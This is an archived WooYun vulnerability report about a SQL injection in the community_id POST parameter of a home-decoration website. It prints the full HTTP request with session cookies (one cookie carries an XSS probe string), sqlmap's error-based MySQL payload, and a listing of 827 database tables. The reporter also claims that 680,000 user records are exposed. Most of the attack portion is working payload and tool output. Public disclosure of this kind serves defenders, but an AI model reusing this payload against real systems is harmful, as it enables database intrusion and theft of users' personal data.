乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 细节已通知厂商并且等待厂商处理中 2015-09-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
http://**.**.**.**/
POST /riji/lists/AjaxChangeLocation/ HTTP/1.1Content-Length: 312Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=6pnm445qa2psbmaev3ih7t88t7; news=udevcj86ap4c6q9gkuhrplttl0; jiazhuang_sid=0; jiazhuang_kid=0; jiazhuang_eid=0; usercookieid=d218c73c1a9eefaf673d8bb677883434; search=f44d8c550400e7d32757dbc8f9da6400e2221312a%3A4%3A%7Bs%3A4%3A%22type%22%3Bi%3A3%3Bs%3A7%3A%22typeall%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22search%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22order%22%3Bs%3A4%3A%22week%22%3B%7D; position_id=2; ZSS0_59f9_saltkey=WKFg18ex; ZSS0_59f9_lastvisit=1442471733; ZSS0_59f9_sid=ZzP1Up; ZSS0_59f9_lastact=1442475430%09member.php%09register; xiaoguotuFront=amhf9s7eo7mmope82vok8qsjk0; ZSS0_59f9_keyword=%E6%96%B0%E6%88%BF%E8%A3%85%E4%BF%AE%E5%90%8E%E6%80%8E%E4%B9%88%E5%8E%BB%E5%91%B3%EF%BC%9F%2C1; ZSS0_59f9_sendmail=1; ZSS0_59f9_home_readfeed=1442475379; ZSS0_59f9_viewid=uid_1273684; ZSS0_59f9_home_diymode=1; BAIDU_DUP_lcr=http://**.**.**.**/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _ga=GA1.2.1379341993.1442475540; _gat=1; Hm_lvt_67984ef0a3cf99a54cad87edfb41cbdc=1442475540,1442477094; Hm_lpvt_67984ef0a3cf99a54cad87edfb41cbdc=1442477094; HMACCOUNT=4C0BCD06693089B9; BAIDUID=DED8AF24EA627A5B5D5AD8964E8F1B75:FG=1; __guid=51556143.2628266920160070000.1442475786134.5842; count=1; gallery_449126=23f0bb61c7f4cb6e0d2f641ee5da71b4c9fca9e2s%3A1%3A%221%22%3B; gallery_694=23f0bb61c7f4cb6e0d2f641ee5da71b4c9fca9e2s%3A1%3A%221%22%3B; gallery_30=23f0bb61c7f4cb6e0d2f641ee5da71b4c9fca9e2s%3A1%3A%221%22%3B; bdshare_firstime=1442476212158; CNZZDATA1000376244=690727009-1442475533-http%253A%252F%252F**.**.**.**%252F%7C1442475533Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*city=799&community_id=1&page=2
community_id存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: community_id (POST) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: city=799&community_id=(SELECT 2290 FROM(SELECT COUNT(*),CONCAT(0x71766b7871,(SELECT (ELT(2290=2290,1))),0x716b717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&page=2---web application technology: PHP 5.3.3back-end DBMS: MySQL 5.0Database: ultrax[827 tables]+--------------------------------------------+| YiiCache || 17_collect || baidusubmit_setting || baidusubmit_sitemap || baidusubmit_urlstat || cdb_attention || cdb_baidusubmit_setting || cdb_baidusubmit_sitemap || cdb_baidusubmit_urlstat || cdb_blacklist || cdb_case_picture || cdb_checkordercode || cdb_complain || cdb_contact_way || cdb_enterprise_info || cdb_fitment_case || cdb_goods_category || cdb_goods_table || cdb_groupon || cdb_grouporder || cdb_intention || cdb_login_log || cdb_myad || cdb_note || cdb_orderdetail || cdb_orders || cdb_owner || cdb_polling || cdb_service_log || cdb_signup_log || cdb_sms_log || cdb_statistics || cdb_subscribe_info || cdb_typeoptionvars || cdb_updindex || cdb_village || cdb_visit_locale || cdb_visit_log || chenshijie_test || gallery || gonyiyanfang || hou || house_emailsend || house_smswilsend || house_smswilsendback || mail@pwd || mail_tmp || pre_baidusubmit_setting || pre_baidusubmit_sitemap || pre_baidusubmit_urlstat || pre_cis_mobilead || pre_cis_weixin || pre_cis_weixin_apps || pre_cis_weixin_hack || pre_cis_weixin_immwalog || pre_cis_weixin_setting || pre_cis_weixin_styles || pre_cis_weixin_uc || pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom || pre_common_banned || pre_common_block || pre_common_block_favorite || pre_common_block_item || pre_common_block_item_data || pre_common_block_permission || pre_common_block_pic || pre_common_block_style || pre_common_block_xml || pre_common_cache || pre_common_card || pre_common_card_log || pre_common_card_type || pre_common_connect_guest || pre_common_credit_log || pre_common_credit_log_field || pre_common_credit_rule || pre_common_credit_rule_log || pre_common_credit_rule_log_field || pre_common_cron || pre_common_devicetoken || pre_common_district || pre_common_diy_data || pre_common_domain || pre_common_failedip || pre_common_failedlogin || pre_common_friendlink || pre_common_grouppm || pre_common_invite || pre_common_magic || pre_common_magiclog || pre_common_mailcron || pre_common_mailqueue || pre_common_member || pre_common_member_action_log || pre_common_member_connect || pre_common_member_copy || pre_common_member_count || pre_common_member_crime || pre_common_member_field_forum || pre_common_member_field_home || pre_common_member_forum_buylog || pre_common_member_grouppm || pre_common_member_log || pre_common_member_magic || pre_common_member_medal || pre_common_member_newprompt || pre_common_member_profile || pre_common_member_profile_setting || pre_common_member_security || pre_common_member_secwhite || pre_common_member_stat_field || pre_common_member_stat_fieldcache || pre_common_member_stat_search || pre_common_member_stat_searchcache || pre_common_member_status || pre_common_member_validate || pre_common_member_verify || pre_common_member_verify_info || pre_common_member_wechat || pre_common_member_wechatmp || pre_common_moderate || pre_common_myapp || pre_common_myinvite || pre_common_mytask || pre_common_nav || pre_common_onlinetime || pre_common_optimizer || pre_common_patch || pre_common_plugin || pre_common_pluginvar || pre_common_process || pre_common_regip || pre_common_relatedlink || pre_common_remote_port || pre_common_report || pre_common_searchindex || pre_common_seccheck || pre_common_secquestion || pre_common_session || pre_common_setting || pre_common_smiley || pre_common_sphinxcounter || pre_common_stat || pre_common_statuser || pre_common_style || pre_common_stylevar || pre_common_syscache || pre_common_tag || pre_common_tagitem || pre_common_task || pre_common_taskvar || pre_common_template || pre_common_template_block || pre_common_template_permission || pre_common_uin_black || pre_common_usergroup || pre_common_usergroup_field || pre_common_verifycode || pre_common_visit || pre_common_word || pre_common_word_type || pre_connect_disktask || pre_connect_feedlog || pre_connect_memberbindlog || pre_connect_postfeedlog || pre_connect_tlog || pre_connect_tthreadlog || pre_czw_threadfield || pre_forum_access || pre_forum_activity || pre_forum_activityapply || pre_forum_announcement || pre_forum_attachment || pre_forum_attachment_0 || pre_forum_attachment_1 || pre_forum_attachment_2 || pre_forum_attachment_3 || pre_forum_attachment_4 || pre_forum_attachment_5 || pre_forum_attachment_6 || pre_forum_attachment_7 || pre_forum_attachment_8 || pre_forum_attachment_9 || pre_forum_attachment_exif || pre_forum_attachment_unused || pre_forum_attachtype || pre_forum_bbcode || pre_forum_collection || pre_forum_collectioncomment || pre_forum_collectionfollow || pre_forum_collectioninvite || pre_forum_collectionrelated || pre_forum_collectionteamworker || pre_forum_collectionthread || pre_forum_creditslog || pre_forum_debate || pre_forum_debatepost || pre_forum_faq || pre_forum_filter_post || pre_forum_forum || pre_forum_forum_threadtable || pre_forum_forumfield || pre_forum_forumrecommend || pre_forum_groupcreditslog || pre_forum_groupfield || pre_forum_groupinvite || pre_forum_grouplevel || pre_forum_groupranking || pre_forum_groupuser || pre_forum_hotreply_member || pre_forum_hotreply_number || pre_forum_imagetype || pre_forum_medal || pre_forum_medallog || pre_forum_memberrecommend || pre_forum_moderator || pre_forum_modwork || pre_forum_newthread || pre_forum_onlinelist || pre_forum_optionvalue136 || pre_forum_optionvalue142 || pre_forum_optionvalue15 || pre_forum_optionvalue16 || pre_forum_optionvalue19 || pre_forum_optionvalue20 || pre_forum_optionvalue21 || pre_forum_optionvalue22 || pre_forum_optionvalue23 || pre_forum_optionvalue98 || pre_forum_order || pre_forum_poll || pre_forum_polloption || pre_forum_polloption_image || pre_forum_pollvoter || pre_forum_post || pre_forum_post_location || pre_forum_post_moderate || pre_forum_post_tableid || pre_forum_postcache || pre_forum_postcomment || pre_forum_postlog || pre_forum_postposition || pre_forum_poststick || pre_forum_promotion || pre_forum_ratelog || pre_forum_relatedthread || pre_forum_replycredit || pre_forum_rsscache || pre_forum_sofa || pre_forum_spacecache || pre_forum_statlog || pre_forum_thread || pre_forum_thread_moderate || pre_forum_threadaddviews || pre_forum_threadcalendar || pre_forum_threadclass || pre_forum_threadclosed || pre_forum_threaddisablepos || pre_forum_threadhidelog || pre_forum_threadhot || pre_forum_threadimage || pre_forum_threadlog || pre_forum_threadmod || pre_forum_threadpartake || pre_forum_threadpreview || pre_forum_threadprofile || pre_forum_threadprofile_group || pre_forum_threadrush || pre_forum_threadtype || pre_forum_trade || pre_forum_tradecomment || pre_forum_tradelog || pre_forum_typeoption || pre_forum_typeoptionvar || pre_forum_typevar || pre_forum_warning || pre_home_album || pre_home_album_category || pre_home_appcreditlog || pre_home_blacklist || pre_home_blog || pre_home_blog_category || pre_home_blog_moderate || pre_home_blogfield || pre_home_class || pre_home_click || pre_home_clickuser || pre_home_comment || pre_home_comment_moderate || pre_home_docomment || pre_home_doing || pre_home_doing_moderate || pre_home_favorite || pre_home_feed || pre_home_feed_app || pre_home_follow || pre_home_follow_feed || pre_home_follow_feed_archiver || pre_home_friend || pre_home_friend_request || pre_home_friendlog || pre_home_notification || pre_home_pic || pre_home_pic_moderate || pre_home_picfield || pre_home_poke || pre_home_pokearchive || pre_home_share || pre_home_share_moderate || pre_home_show || pre_home_specialuser || pre_home_userapp || pre_home_userappfield || pre_home_visitor || pre_mobile_setting || pre_mobile_wechat_authcode || pre_mobile_wechat_masssend || pre_mobile_wechat_resource || pre_mobile_wsq_threadlist || pre_myrepeats || pre_plugin_lj_post || pre_plugin_lj_thread || pre_plugin_ljwenwen_ts || pre_plugin_ljwenwentype || pre_portal_article_content || pre_portal_article_content_copy || pre_portal_article_count || pre_portal_article_count_copy || pre_portal_article_moderate || pre_portal_article_related || pre_portal_article_title || pre_portal_article_title_copy1 || pre_portal_article_trash || pre_portal_article_trash_copy || pre_portal_article_trash_copy1 || pre_portal_attachment || pre_portal_attachment_copy || pre_portal_category || pre_portal_category_copy || pre_portal_category_copy1 || pre_portal_category_permission || pre_portal_comment || pre_portal_comment_moderate || pre_portal_rsscache || pre_portal_topic || pre_portal_topic_copy || pre_portal_topic_pic || pre_security_evilpost || pre_security_eviluser || pre_security_failedlog || pre_singcere_wechat_authcode || pre_singcere_wechat_bind || pre_singcere_wechat_cmd || pre_singcere_wechat_fact || pre_singcere_wechat_richresponse || pre_singcere_wechat_tmplmsg || pre_strayer_article_content || pre_strayer_article_title || pre_strayer_attach || pre_strayer_category || pre_strayer_evo || pre_strayer_evo_log || pre_strayer_fastpick || pre_strayer_member || pre_strayer_picker || pre_strayer_rules || pre_strayer_searchindex || pre_strayer_setting || pre_strayer_timing || pre_strayer_typeoptionvar || pre_strayer_url || pre_ucenter_admins || pre_ucenter_applications || pre_ucenter_area || pre_ucenter_authcode || pre_ucenter_badwords || pre_ucenter_code || pre_ucenter_domains || pre_ucenter_failedlogins || pre_ucenter_feeds || pre_ucenter_friends || pre_ucenter_mailqueue || pre_ucenter_memberfields || pre_ucenter_members || pre_ucenter_mergemembers || pre_ucenter_moneylog || pre_ucenter_newpm || pre_ucenter_notelist || pre_ucenter_pm_indexes || pre_ucenter_pm_lists || pre_ucenter_pm_members || pre_ucenter_pm_messages_0 || pre_ucenter_pm_messages_1 || pre_ucenter_pm_messages_2 || pre_ucenter_pm_messages_3 || pre_ucenter_pm_messages_4 || pre_ucenter_pm_messages_5 || pre_ucenter_pm_messages_6 || pre_ucenter_pm_messages_7 || pre_ucenter_pm_messages_8 || pre_ucenter_pm_messages_9 || pre_ucenter_protectedmembers || pre_ucenter_settings || pre_ucenter_sqlcache || pre_ucenter_tags || pre_ucenter_vars || pre_ucenter_village || rjdasailist || sms_recv || sms_send || sop_admin_log || sop_control || sop_data_ || sop_data__ || sop_data_advs || sop_data_affordable_related || sop_data_affordable_settings || sop_data_annual_groupon || sop_data_annual_groupon_140102 || sop_data_annual_groupon_copy || sop_data_annual_groupon_copy1 || sop_data_annual_plan_log || sop_data_appraise || sop_data_appraise_copy || sop_data_appraise_product || sop_data_article_keywords || sop_data_attachments || sop_data_attachments_copy || sop_data_audit_log || sop_data_audit_log_history || sop_data_bargain || sop_data_bargainagree || sop_data_bargainautosubmit || sop_data_bargainproduct || sop_data_bargainpromotions || sop_data_bargainroutine || sop_data_bargainservice || sop_data_bargainsort || sop_data_bigbrand_ad || sop_data_bigbrand_business || sop_data_bigbrand_business_param || sop_data_bigbrand_business_product || sop_data_bigbrand_groupon || sop_data_biz_employee || sop_data_biz_info || sop_data_blacklist || sop_data_building || sop_data_business || sop_data_business_action_record || sop_data_business_brand || sop_data_business_category || sop_data_business_category_copy || sop_data_business_category_tag || sop_data_business_contact || sop_data_business_contract || sop_data_business_contract_record || sop_data_business_copy_2014_5_29 || sop_data_business_custome_contacts || sop_data_business_customer || sop_data_business_customer_copy || sop_data_business_customer_tag || sop_data_business_deposit || sop_data_business_deposit_log || sop_data_business_deposit_log_bak || sop_data_business_development_plan || sop_data_business_development_plan_linkman || sop_data_business_development_plan_record || sop_data_business_follow_record || sop_data_business_groupon_summary || sop_data_business_groupon_summary_upload || sop_data_business_history || sop_data_business_message || sop_data_business_plan || sop_data_business_reputation || sop_data_business_schedule || sop_data_business_storefront || sop_data_business_tag || sop_data_business_visit || sop_data_business_visit_comment || sop_data_business_voucher || sop_data_business_voucher_new || sop_data_comment_column || sop_data_comment_content || sop_data_comment_recycle || sop_data_comment_reply || sop_data_community || sop_data_community_alias || sop_data_community_audit || sop_data_community_collect_detail || sop_data_community_collect_url || sop_data_community_floor || sop_data_community_hot_area || sop_data_community_source || sop_data_community_subway || sop_data_company || sop_data_company_copy || sop_data_companymobiles || sop_data_complain || sop_data_complain_log || sop_data_contract_business || sop_data_contract_record || sop_data_customer_assess || sop_data_customer_daysoff || sop_data_customer_holiday || sop_data_customer_message || sop_data_customer_setting || sop_data_decoration || sop_data_department || sop_data_designer || sop_data_diary || sop_data_employee || sop_data_employee_company || sop_data_employee_copy || sop_data_error || sop_data_evaluation || sop_data_friends || sop_data_gallery || sop_data_gallery_copy || sop_data_goods || sop_data_groupon || sop_data_groupon_additional || sop_data_groupon_ads || sop_data_groupon_bobao || sop_data_groupon_build || sop_data_groupon_build_city || sop_data_groupon_business || sop_data_groupon_category || sop_data_groupon_category_demand || sop_data_groupon_chair || sop_data_groupon_cost_log || sop_data_groupon_custom_module || sop_data_groupon_demand || sop_data_groupon_demand_describe || sop_data_groupon_discount_info || sop_data_groupon_display_sort || sop_data_groupon_friendlink || sop_data_groupon_good || sop_data_groupon_income || sop_data_groupon_income_audit || sop_data_groupon_message || sop_data_groupon_module || sop_data_groupon_module_product || sop_data_groupon_outlay || sop_data_groupon_outlay_audit || sop_data_groupon_owner || sop_data_groupon_prize || sop_data_groupon_product || sop_data_groupon_recommend_brand || sop_data_groupon_review || sop_data_groupon_sponsor || sop_data_helpcenter || sop_data_home_sign || sop_data_house_type || sop_data_indexman || sop_data_keywords || sop_data_keywords_copy || sop_data_login_log || sop_data_lottery || sop_data_lottery_operate || sop_data_lottery_owner || sop_data_lottery_prize || sop_data_oftenunit || sop_data_onduty || sop_data_order || sop_data_order_bank || sop_data_order_bbs || sop_data_order_bu || sop_data_order_comment_img || sop_data_order_comment_reply || sop_data_order_comments || sop_data_order_contract || sop_data_order_copy || sop_data_order_grouponstatus || sop_data_order_package || sop_data_order_product || sop_data_order_refund || sop_data_order_refund_false || sop_data_order_refund_operation_record || sop_data_order_refundreason || sop_data_order_section || sop_data_order_settlement || sop_data_order_status_log || sop_data_order_zhd_false || sop_data_order_zhdreason || sop_data_owner || sop_data_owner_abnormal || sop_data_owner_community || sop_data_owner_copy || sop_data_owner_copy1 || sop_data_owner_invite_algorithm || sop_data_owner_invite_status || sop_data_owner_log || sop_data_owner_maintenance || sop_data_owner_notcall_maintenance || sop_data_owner_statistics || sop_data_owner_task || sop_data_owner_voucher || sop_data_owner_voucher_new || sop_data_package || sop_data_package_product || sop_data_pengfeileeceshi || sop_data_persistence || sop_data_persistence_temp || sop_data_platform || sop_data_price_business || sop_data_price_groupon || sop_data_price_groupon_good || sop_data_price_ingroupon || sop_data_price_pics || sop_data_price_source || sop_data_pricemonitor || sop_data_pricesource || sop_data_product || sop_data_product_category || sop_data_product_consult || sop_data_product_content || sop_data_product_copy || sop_data_product_groupon || sop_data_product_module || sop_data_product_price_log || sop_data_product_tags || sop_data_region || sop_data_reservation || sop_data_residential || sop_data_residential_apply || sop_data_return_speak_class || sop_data_return_speak_content || sop_data_review || sop_data_review_images || sop_data_sem_keywords || sop_data_sem_module || sop_data_sensitive || sop_data_settlement_log || sop_data_sms || sop_data_sms_approval || sop_data_sms_copy || sop_data_sms_copy2 || sop_data_sms_groupon || sop_data_sms_pool || sop_data_sms_quota || sop_data_sms_quota_log || sop_data_smswillsend || sop_data_source_business || sop_data_store || sop_data_strange_phone || sop_data_strange_phone_action_record || sop_data_strange_phone_import_record || sop_data_strange_phone_need_type || sop_data_strange_phone_plan || sop_data_strange_phone_refuse || sop_data_strange_phone_sms || sop_data_strange_phone_sms_category || sop_data_strange_phone_sms_category_yz || sop_data_strange_phone_sms_pool || sop_data_strange_phone_sms_tactics || sop_data_strange_phone_stage_type || sop_data_strange_phone_sys_algorithm_model || sop_data_subject || sop_data_subject_temp || sop_data_subject_type || sop_data_suggestion || sop_data_tag_decoration || sop_data_tags_product || sop_data_temp_tuiguang || sop_data_temp_tuiguang_bak || sop_data_temp_zhuangxiu || sop_data_topic || sop_data_topic_content || sop_data_topic_frame || sop_data_topic_module || sop_data_topic_module_editor || sop_data_topic_template || sop_data_upload || sop_data_user_thirdparty || sop_data_visit_log_zhuangxiu || sop_data_visit_log_zhuangxiu_2 || sop_data_voucher_check || sop_data_voucher_config || sop_data_voucher_config_new || sop_data_wap_bargain || sop_data_wap_owner_bargain || sop_data_wx_oauth || sop_data_yuyue || sop_data_yuyue_copy || sop_data_yuyue_sendorder || sop_data_yuyue_statistatic || sop_data_yuyue_visit || sop_direction || sop_field_join || sop_form_field || sop_forms || sop_opinion || sop_opinionreply || sop_pm || sop_pm_read || sop_purv || sop_purv_form_field || sop_purv_forms || sop_result || sop_resultrely || sop_role || sop_role_companys || sop_role_copy || sop_role_type || sop_role_user || sop_supplier_ext || sop_syslog || sop_user_ext || sph_counter || sph_lasttime || supe_adminsession || supe_creditlog || supe_photoitems || temp_groupon_owner_company_id || temp_order_company_id || ticketpiao_log || topic || topic_comment || vote_log || web_ads || web_ads_position || web_app_grade || web_appliances_demand || web_apply_enter || web_apply_enter_second || web_brand || web_brand_category || web_brand_groupon_images || web_brand_relevance || web_building || web_building_materials_city || web_building_materials_city_picture || web_business_apply_enter || web_business_attestation || web_business_cat_judge || web_business_cat_judge_body || web_business_classify || web_business_classify_unite || web_business_friendlink || web_business_onlineshop || web_business_points || web_business_price_relation || web_business_service_project_relation || web_business_service_promise || web_business_service_promise_body || web_business_service_relation || web_business_shop || web_business_shop_picture || web_business_shop_picture_copy || web_business_shop_score || web_business_tag || web_buy_list || web_cases || web_cases_category || web_cases_category_tag || web_comment || web_comment_picture || web_comment_praise || web_comment_score || web_comment_tag || web_consult || web_consult_column || web_coupon || web_coupon_log || web_coupon_orders || web_coupon_zorder_log || web_designer || web_designer_cate || web_designer_cate_relation || web_diary || web_diary_ads || web_diary_category || web_diary_channel || web_diary_copy || web_diary_praise || web_diary_special || web_feed || web_friends || web_friends_group || web_gallery_ad || web_gallery_ad_pos || web_gallery_atlas || web_gallery_brand || web_gallery_brand_tag || web_gallery_click || web_gallery_collect || web_gallery_images || web_gallery_images_copy || web_gallery_images_two || web_gallery_link_seo || web_gallery_more || web_gallery_pic_seo || web_gallery_relations || web_gallery_setup || web_gallery_type || web_image_stage || web_image_tag || web_like_number_check || web_link || web_link2 || web_link3 || web_link_copy || web_news || web_news_category || web_news_category_seo || web_news_category_tag || web_news_copy || web_news_copy1 || web_news_footer_recommend || web_news_images || web_news_related || web_news_tag || web_restore || web_send_line || web_seo || web_tag || web_tag_item || web_tag_type || web_uploads |+--------------------------------------------+
泄露68万用户信息:
取用户信息的关键字段看看:
危害等级:高
漏洞Rank:11
确认时间:2015-09-21 17:10
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无
